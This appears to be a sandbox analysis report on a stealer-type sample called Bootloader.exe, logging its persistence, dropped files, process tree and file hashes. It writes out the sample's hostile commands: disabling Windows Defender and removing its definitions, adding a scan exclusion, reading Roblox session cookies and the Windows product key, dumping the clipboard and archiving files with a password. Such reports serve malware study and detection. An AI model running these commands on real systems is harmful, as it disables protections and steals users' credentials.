Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A (32 events)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (23 events)
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A (9 events)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
(64 rows, grouped below; in the original order they form three rounds of powershell.exe, tasklist.exe and WMIC.exe)

Round 1
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 events)
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A (2 events)
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A (21 events, one per privilege, in this order)

Round 2
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (1 event)
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A (1 event)
Token: the same 21 privileges in the same order N/A C:\Windows\System32\Wbem\WMIC.exe N/A (21 events)

Round 3
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (3 events)
Token: SeIncreaseQuotaPrivilege through SeDebugPrivilege, the first 13 entries of the list above N/A C:\Windows\System32\Wbem\WMIC.exe N/A (13 events)

The numeric tokens are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege. The WMIC list is the standard set of privileges present in an administrative token, consistent with wmic.exe enabling every privilege it holds at start-up; the SeDebugPrivilege requests from powershell.exe and tasklist.exe are what let them open and enumerate processes they do not own.

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4104 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 4104 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 4020 wrote to memory of 1120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 4020 wrote to memory of 1120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 1120 wrote to memory of 1124 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1124 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 3944 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 3944 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1536 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1536 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1536 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1536 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1120 wrote to memory of 4380 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4380 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 4120 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4120 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1120 wrote to memory of 3684 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 3684 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1852 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1852 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4672 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4672 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4380 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4412 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4412 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2688 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 2688 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 3684 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3684 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1852 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1852 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4672 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4672 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2688 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2688 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2812 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 2812 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2812 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1120 wrote to memory of 1792 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1792 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1792 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1792 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1120 wrote to memory of 5004 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 5004 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 5004 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 5004 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 2008 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2008 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1120 wrote to memory of 228 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 228 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 5052 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 5052 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Bootloader.exe

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

\??\c:\users\admin\appdata\local\temp\bootloader.exe 

c:\users\admin\appdata\local\temp\bootloader.exe 

\??\c:\users\admin\appdata\local\temp\bootloader.exe 

c:\users\admin\appdata\local\temp\bootloader.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\bootloader.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\bootloader.exe '

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1opmg4cn\1opmg4cn.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DAC.tmp" "c:\Users\Admin\AppData\Local\Temp\1opmg4cn\CSC9FD445552083425BB47825723162E856.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40202\rar.exe a -r -hp"sakiop77" "C:\Users\Admin\AppData\Local\Temp\KPvy0.zip" *"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\_MEI40202\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI40202\rar.exe a -r -hp"sakiop77" "C:\Users\Admin\AppData\Local\Temp\KPvy0.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

Network


Files


C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-localization-l1-2-0.dll

MD5 b402ed77d6f31d825bda175dbc0c4f92
SHA1 1f2a4b8753b3aae225feac5487cc0011b73c0eb7
SHA256 6ed17fb3ca5156b39fbc1ef7d1eefa95e739857607de4cd8d41cecfcd1350705
SHA512 ec04013139f3fd9dbf22b92121d82b2eb97e136f8619790cde2d0b660280e838962f9006d3e4c3a359627b017f2b6ade7edff3bbc26e559c3de37540585602d9

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 b45f933a57e388cfc5399645cdb696f3
SHA1 d85450a4169c79b249d4ef64ad475f6645dc311c
SHA256 2f9c3b077da02c587964a59e9c4e2f383ff8357229eab4b4f04814df94d78ff0
SHA512 e0df0637bdaa4293ef0b4c0a5b9e40e5d2ea891dbb2ce465394efef8a1f07df52630069e63d5e800575ba55c78c79ce095aace3983258b4c576cde500ef3a3be

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-interlocked-l1-1-0.dll

MD5 28fd20b58320f0ed023d9ca19da3a06d
SHA1 b7948da624d84596055a9ae2a45aea3a9b2d7b9b
SHA256 2f2f9660f4ffa814f465676d5b9cb9bb70d0b7c5fc5eb14c34cfe94a50883b21
SHA512 822e34cacc70ee151ff534f960d0820ae7d184a764b41ce23828e8e0e80daf4888f528c9b1351a76883eea2c6eb9674c8418f1787c1999ea06191d67d3928418

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-heap-l1-1-0.dll

MD5 e93f34fdcd8e5ffc34af48c90f6f95d1
SHA1 1cdafb0dfb29712d37307bc5e5edefab0eef6d78
SHA256 eca63fc5c873ce8b36c507e2b9a88caaea9617c84669886b15f6bc38bd0024c6
SHA512 3bf430a6a20b020f60627ae68d6385f3abb7a89b16cccc4aed1939c28527680fce7a426f69353041c7ac50a177a8e7c3a631078e46bc73a8bf0e2b2e83a779a8

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-handle-l1-1-0.dll

MD5 c2cd29370b21c0361d7f79d248c05860
SHA1 52efda4ba402c793d4c75e6ce185720ae1432249
SHA256 550b4f5ba95108b01a24f05496576a4e73642334a10dde61b09846e0efb9f260
SHA512 d2165032403277ba10bfbb7861bbe7395a8b0847a669588d3780953d07c1b0ea4461acc49753e8d4978840307b1c50f9e814ab5b62b8e341159e02109bcbab71

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-file-l2-1-0.dll

MD5 361c6bcfcea263749419b0fbed7a0ce8
SHA1 03db13108ce9d5fc01cecf3199619ffbccbd855a
SHA256 b74aefd6fa638be3f415165c8109121a2093597421101abc312ee7ffa1130278
SHA512 aa8b585000cc65f9841b938e4523d91d8f6db650e0b4bb11efd740c27309bf81cdb77f05d0beda2489bf26f4fbc6d02c93ce3b64946502e2c044eea89696cc76

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-file-l1-2-0.dll

MD5 9d8413744097196f92327f632a85acee
SHA1 dfc07f5e5a0634dd1f15fdc9ff9731748fbff919
SHA256 6878d8168d5cc159efe58f14e5ba10310d99b53ab8495521e54c966994dac50b
SHA512 a8f6e9ee1c5d65f68b8b20d406d3e666c186e15cb3b92575257b5637fe7dd5ac7d75e9ad51c839ba4490512f68f6b48822fc9edd316dd7625d3627d3b975fb2a

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-file-l1-1-0.dll

MD5 33636552339a4a04d75b7c32dbec59d9
SHA1 6457c3941d57bebbc3a737c84377d102b6ece18f
SHA256 05b478718540a6f410a3ad859f7d5e56c223d6786eacc7e9bc80264f587fd0c7
SHA512 b0f9ffed8b8861c9599e5cf0fbc5374e7cd8d170a360a3dfeb37d381dabef941875eaf325666978071d25aa8f49d729684d8be71d12c1b5a8928a7c00156ed03

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-fibers-l1-1-0.dll

MD5 9714923d871b3f88f5be290382a5586d
SHA1 d4b90f3234ba2af1a182aa2b2e483c1d759fd4df
SHA256 b6c3e5d1d35c5b8ac1ca058815c25db87ce6d9c3bb62d9096922b0af2da679cd
SHA512 5b7264d382ffd3378a6a21cdce90bf00d6c018043a965e4fa9ced8361bcf8c0519297cd07572bef65f45eabcbd8451ab09bef43357fc7dd7e8c1a115a551be18

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 6177998c2ce574a177e524746b77efe7
SHA1 21f262c4826e6edd8534a9196afdfae9ac0e3d51
SHA256 a0aa340274d4bb46b6d9547d647ab7dc16c229577bbab836e6a4f3307f310332
SHA512 af8d6bbacd38b23f48f27bb472beb81ee4ee6200ae54317d282ada104252777b57b056fd5de5ff0463ede1be8b734a8741d80c65a70b37910c13f04d85005117

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-debug-l1-1-0.dll

MD5 4cb14835b061f42179d5251e744fd667
SHA1 4a1b0b32963a20c479927e4e008bfa9b4168f226
SHA256 f9aaaabf78feb39a1d8e971f5ce047d1c4a896a80409b800f1f7112cdce420ed
SHA512 20c11b2dcf8a928d04cfe6a0130716cc474d48c996025950214d6f9e97bf26b0ec6e2a68f954b0875fc05ca49811bc6e943f91b592fecd14cc8fddd3201841e9

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-datetime-l1-1-0.dll

MD5 928be2a3fc2e88bda5ca0808324e97c4
SHA1 b1e1bf73c5dfa99ad69bdc83ec6b6f65cef1c3e2
SHA256 cc6c2fdf1c34fa82036165b111f91220bcf7e43aab79dfb284f982f0590bebb1
SHA512 fc83a74dbd60ada174798d7f40d839f30ef4a288805121ea8d303e39c5fc81188f9ee86131c3df3e2b37edfcca2bfeb3f69aa14e93a0d5d87a6255c6e87c73a7

C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-console-l1-1-0.dll

MD5 7699c096202da0db6b07fafc914d60ed
SHA1 6e952be34b9457b0cc3e4aa372d941030407a0fc
SHA256 0052515763a1a31d2527a2eb2523fb7b88d8e55c4e4da5ef352b565476bf21e0
SHA512 ae93507cae8d2096c688850d369f8ef282699770b1e27621ed8ebeede1bb285a290f1e2e06a6e9287a05c243b907371977501f1aa4181810913763e0d5bcc2c0

memory/1120-149-0x00007FFEEF640000-0x00007FFEEF654000-memory.dmp

memory/1120-150-0x00007FFEF7AB0000-0x00007FFEF7ABD000-memory.dmp

memory/1120-151-0x00007FFEE8160000-0x00007FFEE827B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oicgr1s3.p2m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4844-161-0x000002556DC90000-0x000002556DCB2000-memory.dmp

memory/2008-364-0x00000128F84F0000-0x00000128F84F8000-memory.dmp

memory/1120-387-0x00007FFEE9260000-0x00007FFEE9939000-memory.dmp

memory/1120-409-0x00007FFEF8560000-0x00007FFEF8585000-memory.dmp

memory/1120-412-0x00007FFEE8D70000-0x00007FFEE8EE6000-memory.dmp

memory/1120-411-0x00007FFEF7A50000-0x00007FFEF7A74000-memory.dmp

C:\Windows\Resources\Themes\explorer.exe

MD5 f34ecb224532e9537d0d045ca45a1671
SHA1 e41e8e3611d5ddbb9ec9ab6609389da34cf30dfc
SHA256 50ca6bbc0182c03eba5879422fe23628a201d8602d3ac559255faadefe6b9d46
SHA512 a25e8a4f9529200d28dbd93c31e771bfeef1312970874f3a387a3f01f51e2fdc2d98f55e1082bd61fc8e44e6cdb94015756b89ae8b5c026616ba52d9286765e0

memory/1120-419-0x00007FFEE9260000-0x00007FFEE9939000-memory.dmp

memory/1120-434-0x00007FFEEEF60000-0x00007FFEEEF93000-memory.dmp

memory/1120-430-0x00007FFEE8770000-0x00007FFEE8C99000-memory.dmp

memory/1120-429-0x00007FFEE8CA0000-0x00007FFEE8D6D000-memory.dmp

memory/1120-433-0x00007FFEE8160000-0x00007FFEE827B000-memory.dmp

memory/4364-451-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1120-450-0x0000023A95A10000-0x0000023A95F39000-memory.dmp

memory/2892-455-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2172-456-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4104-457-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4724-458-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1120-473-0x00007FFEE8160000-0x00007FFEE827B000-memory.dmp

memory/1120-470-0x00007FFEE8770000-0x00007FFEE8C99000-memory.dmp

memory/1120-484-0x00007FFEE8CA0000-0x00007FFEE8D6D000-memory.dmp

memory/1120-483-0x00007FFEEEF60000-0x00007FFEEEF93000-memory.dmp

